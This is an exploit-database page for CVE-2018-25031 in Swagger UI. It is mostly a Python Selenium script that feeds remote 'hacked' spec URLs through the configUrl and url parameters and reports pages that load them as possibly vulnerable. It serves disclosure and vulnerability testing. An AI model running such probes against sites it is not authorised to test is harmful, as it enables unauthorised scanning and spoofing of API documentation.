Swagger UI 4.1.3 Critical Information Misrepresentation

2023.04.21
Risk: High
Local: No
Remote: Yes
CWE: N/A

# Exploit Title: Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical Information # Date: 14 April, 2023 # Exploit Author: Rafael Cintra Lopes # Vendor Homepage: https://swagger.io/ # Version: < 4.1.3 # CVE: CVE-2018-25031 # Site: https://rafaelcintralopes.com.br/ # Usage: python swagger-exploit.py https://[swagger-page].com from selenium import webdriver from selenium.webdriver.common.desired_capabilities import DesiredCapabilities from selenium.webdriver.chrome.service import Service import time import json import sys if __name__ == "__main__": target = sys.argv[1] desired_capabilities = DesiredCapabilities.CHROME desired_capabilities["goog:loggingPrefs"] = {"performance": "ALL"} options = webdriver.ChromeOptions() options.add_argument("--headless") options.add_argument("--ignore-certificate-errors") options.add_argument("--log-level=3") options.add_experimental_option("excludeSwitches", ["enable-logging"]) # Browser webdriver path drive_service = Service("C:/chromedriver.exe") driver = webdriver.Chrome(service=drive_service, options=options, desired_capabilities=desired_capabilities) driver.get(target+"?configUrl=https://petstore.swagger.io/v2/hacked1.json") time.sleep(10) driver.get(target+"?url=https://petstore.swagger.io/v2/hacked2.json") time.sleep(10) logs = driver.get_log("performance") with open("log_file.json", "w", encoding="utf-8") as f: f.write("[") for log in logs: log_file = json.loads(log["message"])["message"] if("Network.response" in log_file["method"] or "Network.request" in log_file["method"] or "Network.webSocket" in log_file["method"]): f.write(json.dumps(log_file)+",") f.write("{}]") driver.quit() json_file_path = "log_file.json" with open(json_file_path, "r", encoding="utf-8") as f: logs = json.loads(f.read()) for log in logs: try: url = log["params"]["request"]["url"] if(url == "https://petstore.swagger.io/v2/hacked1.json"): print("[Possibly Vulnerable] " + target + "?configUrl=https://petstore.swagger.io/v2/swagger.json") if(url == "https://petstore.swagger.io/v2/hacked2.json"): print("[Possibly Vulnerable] " + target + "?url=https://petstore.swagger.io/v2/swagger.json") except Exception as e: pass


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top